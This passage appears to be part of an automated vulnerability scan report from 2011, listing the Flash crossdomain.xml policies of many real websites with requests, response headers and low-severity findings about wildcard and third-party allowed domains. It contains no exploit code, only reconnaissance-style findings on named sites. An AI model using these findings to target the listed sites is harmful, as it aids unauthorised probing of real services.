   <allow-access-from domain="*.zemoga.com"/>
   <allow-access-from domain="*.searstestsite.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.catapultclients.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.catapultmarketing.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.allurent.net" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.fuelindustries.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cmycasa.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.fluid.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cerosmedia.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.cerosdevelopment.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.lightmakerorlando.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.cerosstaging.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sears.fluid.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.craftsman.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.allurent.net" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.productiveedge.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.zemoga.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kenmore.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.kmart.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.searstestsite.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.catapultclients.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.catapultmarketing.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.colossal-squid.com" to-ports="*" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.digitalfolio.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.sears.realartusa.com" to-ports="*" secure="true" />
...[SNIP]...
7.415. http://www.seattlepi.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.seattlepi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.seattlepi.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 228
Content-Type: text/xml
ETag: "9b1c2bc9396c81:fae"
Expires: Sat, 02 Apr 2011 13:32:09 GMT
Date: Sat, 02 Apr 2011 13:32:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.seattlepi.nwsource.com" />
...[SNIP]...
7.416. http://www.shangri-la.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.shangri-la.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.shangri-la.com

Response

HTTP/1.0 200 OK
Content-Length: 412
Content-Type: text/xml
Content-Location: http://www.shangri-la.com/crossdomain.xml
Last-Modified: Mon, 04 Oct 2010 03:28:26 GMT
Accept-Ranges: bytes
ETag: "f8ab31357463cb1:4f30"
Server: Microsoft-IIS/6.0
X-WebServer-By: WEB02
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://www.shangri-la.com
Date: Sat, 02 Apr 2011 13:44:49 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.shangri-la.com" />
...[SNIP]...
7.417. http://www.shopathome.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.shopathome.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.shopathome.com

Response

HTTP/1.1 200 OK
Content-Length: 273
Content-Type: text/xml
Last-Modified: Wed, 19 May 2010 23:27:23 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CURa ADMa OUR NOR PUR"
X-Server: Web03
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:52 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="shopathome.com" />
<allow-access-from domain="*.shopathome.com" />
...[SNIP]...
7.418. http://www.shopstyle.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.shopstyle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.shopstyle.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:49 GMT
Server: Apache/2.2.13 (Unix)
Last-Modified: Tue, 17 Mar 2009 19:25:12 GMT
Accept-Ranges: bytes
Content-Length: 217
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.shopstyle.com" />
</cros
...[SNIP]...
7.419. http://www.shutterfly.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.shutterfly.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.shutterfly.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:00 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"970-1280438871000"
Last-Modified: Thu, 29 Jul 2010 21:27:51 GMT
Content-Type: application/xml
Content-Length: 970
Set-Cookie: lb=WFEu3qVZ-app196; Path=/
Set-Cookie: BIGipServerAPP-B-LR=1332809900.20480.0000; path=/
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*.shutterfly.com" secure="false" to-ports="443" />
...[SNIP]...
<allow-access-from domain="*.staticsfly.com" secure="false" to-ports="443" />
...[SNIP]...
<allow-access-from domain="*.betawave.com" secure="false" to-ports="80,443" />
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
7.420. http://www.simon.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.simon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.simon.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 May 2010 18:11:42 GMT
Accept-Ranges: bytes
ETag: "083f9ec8fdca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 02 Apr 2011 14:09:18 GMT
Connection: close
Content-Length: 346

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.stanfordshop.com"/>
<allow-access-from domain="stanfordshop.com"/>
<allow-access-from domain="*.cdn.cloudfiles.rackspacecloud.com"/>
...[SNIP]...
7.421. http://www.simplyhired.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.simplyhired.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.simplyhired.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 12:44:06 GMT
Content-Type: text/xml
Connection: close
Set-Cookie: gc=1; expires=Sun, 03-Apr-2011 12:44:06 GMT; path=/
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Length: 120

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.thespringbox.com" />
</cross-domain-policy>
7.422. http://www.sixflags.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sixflags.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sixflags.com

Response

HTTP/1.1 200 OK
Content-Length: 267
Content-Type: text/xml
Last-Modified: Thu, 05 Mar 2009 19:53:24 GMT
Accept-Ranges: bytes
ETag: "79c111bcc9dc91:6ff"
Server: Microsoft-IIS/6.0
X-Powered-By: web3
Date: Sat, 02 Apr 2011 14:10:24 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://www.sixflags.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.cygnus.com" />
<allow-access-from domain="*.accesso.com" />
<allow-access-from domain="*.ceiris.com" />
...[SNIP]...
7.423. http://www.sky.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sky.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Mar 2011 14:58:52 GMT
Content-Type: text/xml
ETag: "pvcb59ab292c695f24aa10ec344e582daf"
Expires: Sat, 02 Apr 2011 14:00:15 GMT
Cache-Control: private, max-age=60
X-PvInfo: [S10202.C10879.A67423.RA0.G10818.UBB627152].[OT/xml.OG/pages]
X-Cnection: Close
Date: Sat, 02 Apr 2011 13:59:15 GMT
Content-Length: 444
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.google.com" />
   <allow-access-from domain="*.google.co.uk" />
   <allow-access-from domain="*.sky.com" />
   <allow-access-from domain="*.bskyb.com" />
   <allow-access-from domain="*.doubleclick.com" />
   <allow-access-from domain="*.doubleclick.net" />
...[SNIP]...
7.424. http://www.skype.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.skype.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.skype.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:14 GMT
Server: Apache
Last-Modified: Thu, 14 Oct 2010 09:18:24 GMT
ETag: "1a2-4929031207800"
Accept-Ranges: bytes
Content-Length: 418
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml
Content-Language: en

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>    
<allow-access-from domain="*.skype.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skype.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skype.test" secure="false" />
...[SNIP]...
7.425. http://www.slate.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.slate.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.slate.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=864000
Content-Length: 284
Content-Type: text/xml
Last-Modified: Fri, 21 May 2010 14:41:54 GMT
Accept-Ranges: bytes
ETag: "3c258fc1f3f8ca1:64"
Server: Microsoft-IIS/6.0
Date: Sat, 02 Apr 2011 13:30:57 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*.slate.com" />
   <allow-access-from domain="*.slatev.com" />
   <allow-access-from domain="*.wpni.com" />
   <allow-access-from domain="*.washingtonpost.com" />
   <allow-access-from domain="*.brightcove.com" />
...[SNIP]...
7.426. http://www.slide.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.slide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.slide.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:09 GMT
Server: Apache/2.2
Last-Modified: Thu, 24 Mar 2011 21:19:25 GMT
Vary: Accept-Encoding
X-Host: wb0.la1
Content-Length: 845
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*.slide.com" he
...[SNIP]...
<allow-access-from domain="*.slide.com" />
   <allow-access-from domain="*.slideobjects.com" />
   <allow-access-from domain="*.superpokepets.com" />
   <allow-access-from domain="*.socialstar.com" />
   <allow-access-from domain="*.sppranch.com" />
...[SNIP]...
7.427. http://www.smarter.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smarter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.smarter.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:08 GMT
Server: Apache
Last-Modified: Tue, 11 May 2010 05:55:40 GMT
ETag: "76740-d6-4864b2cda0f00"
Accept-Ranges: bytes
Content-Length: 214
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.smarter.com" />
</cross-d
...[SNIP]...
7.428. http://www.smilebox.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smilebox.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.smilebox.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:04 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 00:51:13 GMT
ETag: "455018d-e9-4940752486240"
Accept-Ranges: bytes
Content-Length: 233
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.smilebox.com" />
...[SNIP]...
7.429. http://www.smileycentral.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smileycentral.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.smileycentral.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:21 GMT
Server: Apache/1.3.27 (Unix) Resin/2.0.5
Pragma: no-cache
Cache-control: max-age=0, must-revalidate
Expires: Sat 02 Apr 1977 17:15:00 GMT
Last-Modified: Mon, 21 Aug 2006 19:26:26 GMT
ETag: "679080-e7-44ea08e2"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.smileycentral.com" />
...[SNIP]...
7.430. http://www.snapfish.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.snapfish.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.snapfish.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:31 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"7097-1301617465000"
Last-Modified: Fri, 01 Apr 2011 00:24:25 GMT
Content-Type: application/xml
Content-Length: 7097
Connection: close
Set-Cookie: BIGipServersf3-scw-pod2=1695232522.16415.0000; path=/

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>


<allow-access-from domain="*.clarkcolor.com" secure="false" />
<allow-http-request-headers-
...[SNIP]...
<allow-access-from domain="*.snapfish-epuzzle.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.mysticcolorlab.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.at" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.be" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.ch" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.co.in" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.com.au" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.com.sg" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.co.nz" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.de" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.es" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.eu" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.fr" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.it" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.jp" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.lu" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.nl" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.se" secure="false" />
...[SNIP]...
<allow-access-from domain="*.truprint.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="*.walgreens.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.walmart.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yorkphoto.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.akamai-trials.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.goosiecards.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="images1.sfus1.qa.snapfish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="images2.sfus1.qa.snapfish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.qa.snapfish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="http://www2.sfsg1.qa.snapfish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="http://www1.sfsg1.qa.snapfish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="http://garskin.asia" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.garskin.asia" secure="false"/>
...[SNIP]...
<allow-access-from domain="http://dgsc.photo2.walgreens.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="localhost" secure="false"/>
...[SNIP]...
<allow-access-from domain="127.0.0.1" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.locr.com" />
<allow-access-from domain="*.wissenswerft.net" />
<allow-access-from domain="50.16.223.152" secure="false"/>
...[SNIP]...
<allow-access-from domain="snapfish.fingerprintpress.com" />
<allow-access-from domain="snapfish-staging.fingerprintpress.com" />
<allow-access-from domain="apps.ezprints.com" />
<allow-access-from domain="http://snapfish.planetjill.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="http://snapfish-stage.planetjill.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.kidlandia.com" secure="false" />
...[SNIP]...
<allow-access-from domain="publisherapp.myprinting.de" secure="false"/>
...[SNIP]...
7.431. http://www.softonic.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softonic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.softonic.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:35 GMT
Server: Apache
Expires: Sat, 02 Apr 2011 15:10:36 GMT
Cache-Control: max-age=5401, public
Last-Modified: Sat, 02 Apr 2011 11:10:36 GMT
ETag: "ec2faefc0402e177782d953fded2df8a"
Set-Cookie: softonic_es-admin=deleted; expires=Fri, 02-Apr-2010 13:40:34 GMT; path=/; domain=softonic.com
Set-Cookie: blang=_; expires=Sun, 01-Apr-2012 13:40:35 GMT; path=/; domain=softonic.com
Set-Cookie: country=US; expires=Sun, 01-Apr-2012 13:40:35 GMT; path=/; domain=softonic.com
Set-Cookie: ucountry=NA; expires=Sun, 01-Apr-2012 13:40:35 GMT; path=/; domain=softonic.com
Set-Cookie: sads_country=US; expires=Sun, 01-Apr-2012 13:40:35 GMT; path=/; domain=softonic.com
Set-Cookie: entry=Direct; expires=Sun, 01-Apr-2012 13:40:35 GMT; path=/; domain=softonic.com
Set-Cookie: PHPSESSID=d2964ace008ef5e5db9091ee1d0d62e4; path=/; domain=softonic.com
Vary: Accept-Encoding,User-Agent
Content-Length: 963
Connection: close
Content-Type: application/xml; charset=utf-8

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-p
...[SNIP]...
<allow-access-from domain="*.softonic.com/" to-ports="*" />
   <allow-access-from domain="*.onsoftware.com" to-ports="*" />
   <allow-access-from domain="screencast-us.softonic.com" to-ports="*" />
   <allow-access-from domain="screencast-eu.softonic.com" to-ports="*" />
   <allow-access-from domain="*.sftcdn.net" to-ports="*" />
...[SNIP]...
7.432. http://www.spanishdict.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.spanishdict.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.spanishdict.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:49 GMT
Server: Apache
Last-Modified: Mon, 03 Aug 2009 16:43:52 GMT
ETag: "16e-4703f79968200"
Accept-Ranges: bytes
Content-Length: 366
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:41:49 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.spanishdict.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sdsandbox.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sdswift.com" secure="false" />
...[SNIP]...
7.433. http://www.spellingcity.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.spellingcity.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.spellingcity.com

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Sat, 02 Apr 2011 13:43:11 GMT
Content-Type: text/xml
Content-Length: 278
Last-Modified: Tue, 30 Nov 2010 17:56:31 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.spellingcity.com" />
<allow-access-from domain="*.vocabulary.co.il" />
...[SNIP]...
